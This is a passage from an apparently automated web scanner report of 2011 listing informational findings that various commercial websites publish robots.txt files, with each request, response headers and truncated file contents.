Disallow: /prequest
Disallow: /chist
Disallow: /ghint
Disallow: /lists
Disallow: /webcontroller


...[SNIP]...

24.739. http://www.shop.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shop.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shop.com

Response

HTTP/1.1 200 OK
Server: AMOS/1.0
Date: Sat, 02 Apr 2011 13:41:28 GMT
Content-Type: text/plain; charset=ISO-8859-1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR NID CURa OUR NOR PHY UNI DEM PRE"
Set-Cookie: AMOS_SID=_live_ticks%3D1301751688765%26live%3DOEzzp%252Eh~UZZYzZezzZwpwzhqUjzpqUmzkWjYWeqwemjXzqwh; Path=/; Domain=.shop.com;
Set-Cookie: AMOS_NS_ID=073; Path=/; Domain=.shop.com;
Set-Cookie: CC_SRCID=1119; Path=/; Domain=www.shop.com;
Set-Cookie: AMID=2232137533; Path=/; Domain=.shop.com; Expires=Tuesday, 01-Jan-38 00:00:01 GMT
Set-Cookie: CATALOGCITY_SSNLIVE260=2232137533; Path=/; Domain=.shop.com;
Content-Length: 642


User-agent: *
Disallow: /*-link_off.xhtml*
Disallow: /*main=ajax*
Disallow: /*pfdbk*
Disallow: /*ajax_price_alert*
Disallow: /*ajaxreview*
Disallow: /*ajax_lists*
Disallow: /*ccn_send_page
...[SNIP]...

24.740. http://www.shopathome.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopathome.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shopathome.com

Response

HTTP/1.1 200 OK
Content-Length: 1440
Content-Type: text/plain
Last-Modified: Mon, 07 Feb 2011 18:47:54 GMT
Accept-Ranges: bytes
ETag: "0695687f7c6cb1:bb2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:26:52 GMT
Connection: close

Sitemap: http://www.shopathome.com/SiteMapIndex.xml

User-agent: *
Disallow: /Catalogs/Outclick.aspx
Disallow: /Catalogs/Checkout/
Disallow: /Privacy.aspx
Disallow: /Eula.aspx
Disallow: /Contac
...[SNIP]...

24.741. http://www.shopcompanion.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopcompanion.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shopcompanion.com

Response

HTTP/1.1 200 OK
Server: AMOS/1.0
Date: Sat, 02 Apr 2011 14:00:36 GMT
Content-Type: text/plain; charset=ISO-8859-1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR NID CURa OUR NOR PHY UNI DEM PRE"
Set-Cookie: AMOS_SID=_live_ticks%3D1301752836384%26live%3DOEzzh%252Eh~WkeXhhXmzeYhzzhWpwzYYkjzzpmZqVVVWpUjzepemp; Path=/; Domain=.shopcompanion.com;
Set-Cookie: AMOS_NS_ID=049; Path=/; Domain=.shopcompanion.com;
Set-Cookie: CC_SRCID=369; Path=/; Domain=www.shopcompanion.com;
Set-Cookie: AMID=2232139882; Path=/; Domain=.shopcompanion.com; Expires=Tuesday, 01-Jan-38 00:00:01 GMT
Set-Cookie: CATALOGCITY_SSNLIVE111=2232139882; Path=/; Domain=.shopcompanion.com;
Content-Length: 778


User-agent: *
Disallow: /*-link_off.xhtml*
Disallow: /*main=ajax*
Disallow: /*pfdbk*
Disallow: /*ajax_price_alert*
Disallow: /*ajaxreview*
Disallow: /*ajax_lists*
Disallow: /*ccn_send_page
...[SNIP]...

24.742. http://www.shopping.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shopping.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Sat, 02 Apr 2011 13:26:23 GMT
Connection: close

User-agent: *
Disallow: /sdcSeo
Disallow: /*?all
Disallow: /*&all

24.743. http://www.shopstyle.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopstyle.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shopstyle.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:49 GMT
Server: Apache/2.2.13 (Unix)
Last-Modified: Thu, 07 Oct 2010 00:19:09 GMT
Accept-Ranges: bytes
Content-Length: 2307
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Connection: close
Content-Type: text/plain; charset=UTF-8

#
# NOTE WE MAINTAIN MANY OF THESE: KEEP THEM IN SYNC
#

# www.apptus.com's crawler generates many exceptions
User-agent: apptus_tce
Disallow: /

# www.apptus.com's crawler generates many exceptions
U
...[SNIP]...

24.744. http://www.shopzilla.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopzilla.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shopzilla.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: trafficSourceDebugParam=; Domain=.shopzilla.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
P3P: CP="NON DSP ADM DEV PSD CUSo OUR IND STP PRE NAV UNI"
Pragma:
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control:
Set-Cookie: sessionid=720212189460109582; Domain=.shopzilla.com; Expires=Sun, 03-Apr-2011 13:26:22 GMT; Path=/
Set-Cookie: br=13017507824562226718502020102025238; Domain=.shopzilla.com; Expires=Tue, 30-Mar-2021 13:26:22 GMT; Path=/
Set-Cookie: _data=_time%3A%3Astart_time%3D1301750782%3Btimestamp%3D1301750782%7Ctracker%3A%3Ahtcnt%3D1%3Brf%3Dwlk; Domain=.shopzilla.com; Expires=Sun, 03-Apr-2011 13:26:22 GMT; Path=/
Set-Cookie: rng=3282754; Domain=.shopzilla.com; Expires=Sun, 03-Apr-2011 13:26:22 GMT; Path=/
ETag: W/"2835-1299516992000"
Last-Modified: Mon, 07 Mar 2011 16:56:32 GMT
Content-Type: text/plain;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2835
Date: Sat, 02 Apr 2011 13:26:22 GMT
Connection: close

User-Agent: *
Disallow: /rd2
Disallow: /rd
Disallow: /mybizrate/
Disallow: /color_bumper.xpml
Disallow: /RetailStores
Disallow: /ProductReserve

#
# Crawlers that are kind enough to obey, but which we
...[SNIP]...

24.745. http://www.shutterfly.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shutterfly.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shutterfly.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:00 GMT
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa TAIa PSAa PSDa OUR BUS ONL COM NAV INT STA PRE UNI"
Accept-Ranges: bytes
ETag: W/"662-1300301336000"
Last-Modified: Wed, 16 Mar 2011 18:48:56 GMT
Content-Type: text/plain
Content-Length: 662
Set-Cookie: JSESSIONID=FE2F7103244DD1545EFB305E0E2AAC7A; Path=/
Set-Cookie: sflyversion="E"; Domain=.shutterfly.com; Path=/
Set-Cookie: masterServer="serverName:www.shutterfly.com&sessionId:FE2F7103244DD1545EFB305E0E2AAC7A&serverIP:172.16.113.79"; Domain=.shutterfly.com; Path=/
Set-Cookie: visitor="9c88f3aa-5d2c-11e0-b15f-a9cda24195d1"; Domain=.shutterfly.com; Expires=Fri, 27-Dec-2013 13:25:00 GMT; Path=/
Set-Cookie: lb=qymEPJg3-app196; Path=/
Set-Cookie: BIGipServerAPP-B-LR=1332809900.20480.0000; path=/
Connection: close

# Tells Scanning Robots Where They Are And Are Not Welcome
#
# User-agent: can also specify by name; "*" is for everyone
# Disallow: disallow if this matches first part of requested path
#

User
...[SNIP]...

24.746. http://www.simon.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.simon.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.simon.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 03 Aug 2010 16:57:57 GMT
Accept-Ranges: bytes
ETag: "87c79d52d33cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 02 Apr 2011 14:09:19 GMT
Connection: close
Content-Length: 53

User-Agent: *
Disallow: /errors/
Disallow: /Assets/

24.747. http://www.simplyhired.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.simplyhired.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.simplyhired.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 12:44:07 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Length: 864
Via: Simply Cache

User-agent: *
Disallow: /a/legal/
Disallow: /a/job-feed/rss/
Disallow: /a/job-details/view/
Disallow: /a/jump/to/
Disallow: /a/error/
User-agent: Slurp
Disallow: /a/legal/
Disallow: /a/job-feed/rss/
D
...[SNIP]...

24.748. http://www.sing365.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sing365.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sing365.com

Response

HTTP/1.0 200 OK
Server: Lotus-Domino
Date: Sat, 02 Apr 2011 05:28:08 GMT
Content-Type: text/plain
Content-Length: 161
Last-Modified: Mon, 26 Feb 2007 07:55:08 GMT
Accept-Ranges: bytes
Connection: close

User-agent: Googlebot
Disallow: /*?*
Disallow: /*unid*
Disallow: /*Unid*
Disallow: /*singerAll*
Disallow: /*SingerAll*
Disallow: /*/0/*
Disallow: /*archive.nsf*

24.749. http://www.singlesnet.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.singlesnet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.singlesnet.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:50:16 GMT
Content-Type: text/plain
Content-Length: 24
Last-Modified: Wed, 30 Mar 2011 17:43:05 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

User-agent: *
Disallow:

24.750. http://www.sky.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sky.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sky.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 16 Mar 2011 14:59:02 GMT
Content-Type: text/plain; charset=UTF-8
ETag: "pv8851dd55398c6783e38952c8d3a56e1f"
Expires: Sat, 02 Apr 2011 12:17:17 GMT
Cache-Control: max-age=60
X-PvInfo: [S10204.C10879.A67423.RA0.G10818.U43A35DEE].[OT/plaintext.OG/documents]
Date: Sat, 02 Apr 2011 13:59:15 GMT
Content-Length: 1165
Connection: close

User-agent: *
# Older file
Disallow: /portal/site/skybb/search
# New File
Disallow: /cgi/
Disallow: /Account_Billing/
Disallow: /Assets/
Disallow: /Getting_Started/
Disallow: /How_To_Get_Sky/
Disallow
...[SNIP]...

24.751. http://www.skype.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.skype.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:14 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 12:03:15 GMT
ETag: "a2-48b8000f566c0"
Accept-Ranges: bytes
Content-Length: 162
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Language: en

User-agent: *
Disallow: /temp/
Disallow: /store/accessories/
Disallow: */downloading/
Disallow: /go/help.ticket.submit$

Sitemap: http://www.skype.com/sitemap.xml

24.752. http://www.slate.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.slate.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.slate.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=600
Content-Length: 535
Content-Type: text/plain
Last-Modified: Wed, 17 Nov 2010 22:56:26 GMT
Accept-Ranges: bytes
ETag: "089b5a9aa86cb1:eb5"
Server: Microsoft-IIS/6.0
Date: Sat, 02 Apr 2011 13:30:58 GMT
Connection: close

User-agent: *
Disallow: /id/3936/
Disallow: /id/3944/
Disallow: /id/2068034/
Disallow: /id/76816/
Disallow: /id/85223/
Disallow: /id/76816/
Disallow: /id/2057494/
Disallow: /id/2059043/
Disal
...[SNIP]...

24.753. http://www.slide.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.slide.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.slide.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:27:09 GMT
Server: Apache/2.2
Last-Modified: Wed, 19 Nov 2008 22:04:06 GMT
Vary: Accept-Encoding
X-Host: wb0.la1
Content-Length: 620
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /accept
Disallow: /addphotos
Disallow: /arrange
Disallow: /channel_finder
Disallow: /channelajax
Disallow: /display_trackback
Disallow: /feedback
Disallow: /i/
Disallow: /ifram
...[SNIP]...

24.754. http://www.slideshare.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.slideshare.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.slideshare.net

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Content-Type: text/plain
Last-Modified: Fri, 01 Apr 2011 18:28:13 GMT
Content-Length: 284
Date: Sat, 02 Apr 2011 13:37:27 GMT
X-Varnish: 2056362666 2056357499
Age: 30
Via: 1.1 varnish
Connection: close

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt fil
#User-agent: Slurp
#Crawl-delay: 5

Sitemap: http://www.slideshare.net/sitemap.xml
User-agent: *
Disa
...[SNIP]...

24.755. http://www.smarter.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smarter.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.smarter.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:09 GMT
Server: Apache
Static-Dir-Bind: robots.txt, /mezi/sites/smarter.com/code/web/, /
Cache-Control: max-age=3600
Expires: Sat, 02 Apr 2011 14:32:09 GMT
ETag: "284cef529dd182c1fdd9a7b32246653c"
Loader-Time-Used: 0.00085
Vary: Accept-Encoding,User-Agent
Content-Length: 2346
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow:/*--sb*
Disallow:/abusereview.php
Disallow:/accountsetting.php
Disallow:/ads.php
Disallow:/agreement.php
Disallow:/allbrands.php
Disallow:/allstores.php
Disallow:/apparel/produc
...[SNIP]...

24.756. http://www.smilebox.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smilebox.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.smilebox.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:04 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 2010 00:50:30 GMT
ETag: "14f8112-c4-494074fb84180"
Accept-Ranges: bytes
Content-Length: 196
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /_mm/
Disallow: /go/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi

Sitemap: http://www.smilebox.com/sitemap.xml

24.757. http://www.smugmug.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smugmug.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.smugmug.com

Response

HTTP/1.0 200 OK
Server: Apache
X-S: 162.8:3709
X-Powered-By: SmugMug/0.9
X-SmugMug-Hiring: How to love what you do: http://www.smugmug.com/jobs/
X-SmugMug-Values: 2/4 - Love your employees
Cache-Control: private, no-store, no-cache, max-age=1, must-revalidate
Expires: Sat, 02 Apr 2011 13:37:21 GMT
ETag: "4ea613a63883228741a82864a76b4e83"
Content-Type: text/plain; charset=utf-8
Date: Sat, 02 Apr 2011 13:37:21 GMT
Content-Length: 3215
Connection: close

# If you're reading this, you belong at a job you love: http://www.smugmug.com/jobs/
# See http://www.smugmug.com/help/emailreal if you'd like to apply to be whitelisted for crawling this site

User-a
...[SNIP]...

24.758. http://www.snagajob.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.snagajob.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.snagajob.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
Content-Type: text/plain
Date: Sat, 02 Apr 2011 12:52:43 GMT
Accept-Ranges: bytes
ETag: "b330baa68ee2cb1:0"
Last-Modified: Mon, 14 Mar 2011 21:27:42 GMT
X-Powered-By: ASP.NET
Content-Length: 1094
Connection: close

# robots.txt for http://www.snagajob.com/ (JobSeeker)

User-agent: *
Disallow: /admin/
Disallow: /monitor/
Disallow: /gas/
Disallow: /gadgetspecs/
Disallow: /googlegadget/
Disallow: /affiliate
...[SNIP]...

24.759. http://www.snapfish.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.snapfish.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.snapfish.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:32 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=1209600
Expires: Sat Apr 16 06:40:32 PDT 2011
Pragma: max-age=1209600
Content-Type: text/plain; charset=UTF-8
Content-Length: 6479
Connection: close
Set-Cookie: BIGipServersf3-scw-pod2=1208693258.16415.0000; path=/

User-agent: *
Disallow: /admin/
Disallow: /ygptemp/
Disallow: /modern_mom/
Disallow: /attwireless/
Disallow: /ivillage/
Disallow: /frommerscobrand/
Disallow: /aimtoday/
Disallow: /tickle/
Disallow: /m
...[SNIP]...

24.760. http://www.socialsecurity.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.socialsecurity.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.socialsecurity.gov

Response

HTTP/1.1 200 OK
Server: Generic Web Server 1.0
Date: Sat, 02 Apr 2011 13:43:57 GMT
Cache-control: public
Content-type: text/plain
Last-modified: Tue, 18 Aug 2009 14:19:27 GMT
Content-length: 775
Etag: "307-4a8ab86f"
Accept-ranges: bytes
Connection: close

# www.ssa.gov robots.txt
# 09/03/08
# Larry Montgomery
User-Agent: *
Disallow: /admin/
Disallow: /cgi-bin/
Disallow: /temp/
Disallow: /aian/
Disallow: /archives/
Disallow: /caosa/
Disallow:
...[SNIP]...

24.761. http://www.sodahead.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sodahead.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sodahead.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:41:40 GMT
Content-Type: text/plain
Connection: close
Vary: Accept-Encoding

User-agent: *
Disallow: /css/
Disallow: /js/
Disallow: /images/
Disallow: /remote/
Disallow: /users/browse/
Sitemap: http://www.sodahead.com/sitemap.xml.gz

24.762. http://www.soft32.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soft32.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.soft32.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Sat, 02 Apr 2011 14:20:01 GMT
Last-Modified: Mon, 07 Mar 2011 15:20:20 GMT
Server: nginx
X-commando: Bill
X-DNS-Prefetch-Control: off
Accept-Ranges: bytes
Cache-Control: private, max-age=86400
Age: 0
Expires: Sun, 03 Apr 2011 14:20:01 GMT
x-cdn: Served by Cotendo
Connection: close

Sitemap: http://www.soft32.com/sitemap.xml

User-agent: Mediapartners-Google*
Disallow:

User-agent: NPBot
Disallow: /

User-agent: grub-client
Disallow: /

User-agent: grub
Disallow: /

...[SNIP]...

24.763. http://www.soft82.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soft82.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.soft82.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:15:12 GMT
Server: Apache/1.3.42 (Unix) PHP/5.3.4 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Sun, 30 Nov 2008 20:39:48 GMT
ETag: "fd808c-12fb-4932fa14"
Accept-Ranges: bytes
Content-Length: 4859
Connection: close
Content-Type: text/plain

Sitemap: http://www.soft82.com/sitemap_index.xml

User-agent: Slurp
Disallow:

User-agent: Mediapartners-Google*
Disallow:

User-agent: MJ12bot
Disallow: /

User-agent: Webbot
Disallow: /

User-agent
...[SNIP]...

24.764. http://www.softonic.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softonic.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.softonic.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:36 GMT
Server: Apache
Set-Cookie: softonic_es-admin=deleted; expires=Fri, 02-Apr-2010 13:40:35 GMT; path=/; domain=softonic.com
Set-Cookie: PHPSESSID=97e7c244f8b19ffde300ad8e6db80922; path=/; domain=softonic.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-control: max-age=0, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Length: 132
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /google_ad.phtml
Disallow: /google_ads.phtml
Disallow: /google_ads/
Disallow: /startgate.gif
Disallow: /v/


24.765. http://www.softpedia.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softpedia.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.softpedia.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:24 GMT
Server: Apache
Last-Modified: Tue, 18 Jan 2011 09:08:08 GMT
Accept-Ranges: bytes
Content-Length: 6519
Connection: close
Content-Type: text/plain

Sitemap: http://www.softpedia.com/sitemap_index.xml
Sitemap: http://www.softpedia.com/sitemap_es_index.xml
Sitemap: http://www.softpedia.com/sitemap_hubs.xml.gz

User-agent: Mediapartners-Google*
Dis
...[SNIP]...

24.766. http://www.songlyrics.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.songlyrics.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.songlyrics.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 11:39:06 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 11 Feb 2009 02:14:15 GMT
Accept-Ranges: bytes
Content-Length: 104
Vary: Accept-Encoding
Cache-Control: public, max-age=7200
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /admin/
Disallow: /openx/
Disallow: /flash/

User-agent: ia_archiver
Disallow: /

24.767. http://www.sony.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sony.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sony.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "12835f-358-f2bffc00"
Accept-Ranges: bytes
Content-Type: text/plain
Age: 205
Date: Sat, 02 Apr 2011 13:50:45 GMT
Last-Modified: Wed, 10 Oct 2007 15:14:56 GMT
Content-Length: 856
Connection: close

# robots.txt for http://www.sony.com/

User-agent: *
Disallow: /500.shtml
Disallow: /401.shtml
Disallow: /403.shtml
Disallow: /401.shtml
Disallow: /online.shtml
Disallow: /SCA/info/
Disallow:
...[SNIP]...

24.768. http://www.southwest.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.southwest.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.southwest.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:27:25 GMT
Server: Apache
Accept-Ranges: bytes
X-Swa-ws: BADIS
Content-Length: 88
Connection: close
Content-Type: text/plain

# No robots allowed in CGI
User-agent: *
Disallow: /cgi-bin/
Disallow: /testimonials/

24.769. http://www.spanishdict.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.spanishdict.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.spanishdict.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:41:49 GMT
Server: Apache
Last-Modified: Thu, 20 Aug 2009 23:04:46 GMT
ETag: "30-4719ac7183f80"
Accept-Ranges: bytes
Content-Length: 48
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:41:49 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /m/translate/
Allow: /

24.770. http://www.sparkpeople.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sparkpeople.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sparkpeople.com

Response

HTTP/1.1 200 OK
Content-Length: 436
Content-Type: text/plain
Last-Modified: Tue, 11 Jan 2011 19:32:33 GMT
Accept-Ranges: bytes
ETag: "2e6b2b4bc6b1cb1:1329"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:56:42 GMT
Connection: close

http://www.sparkpeople.com/sp_sitemap.xml.gz # Added by Google Sitemap Generator

User-agent: *
Disallow: /myspark/nutrition.asp
Disallow: /myspark/fitness2.asp
Disallow: /myspark/other_goals.asp
...[SNIP]...

24.771. http://www.spellingcity.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.spellingcity.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.spellingcity.com

Response

HTTP/1.1 200 OK
Server: nginx/0.9.5
Date: Sat, 02 Apr 2011 13:43:11 GMT
Content-Type: text/plain
Content-Length: 418
Last-Modified: Wed, 26 Jan 2011 17:40:38 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

24.772. http://www.spike.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.spike.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.spike.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Length: 161
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:31:40 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:31:40 GMT; path=/
Vary: User-Agent

User-agent: *
Disallow: /fragments/
Disallow: /search/
Disallow: /tag/
Disallow: /*_df
Disallow: /*return%20false
Sitemap: http://www.spike.com/sitemap_index.xml

24.773. http://www.spokeo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.spokeo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.spokeo.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:29 GMT
Server: Apache
Last-Modified: Tue, 22 Feb 2011 21:42:53 GMT
ETag: "7fa8ba-15f-49ce5dcd17140"
Accept-Ranges: bytes
Content-Length: 351
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /privacy
Disallow: /email-search/search
Disallow: /email/search
Disallow: /username-search/search
Disallow: /username/search
Disallow: /name/search
Disallow: /name-search/searc
...[SNIP]...

24.774. http://www.sportsauthority.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
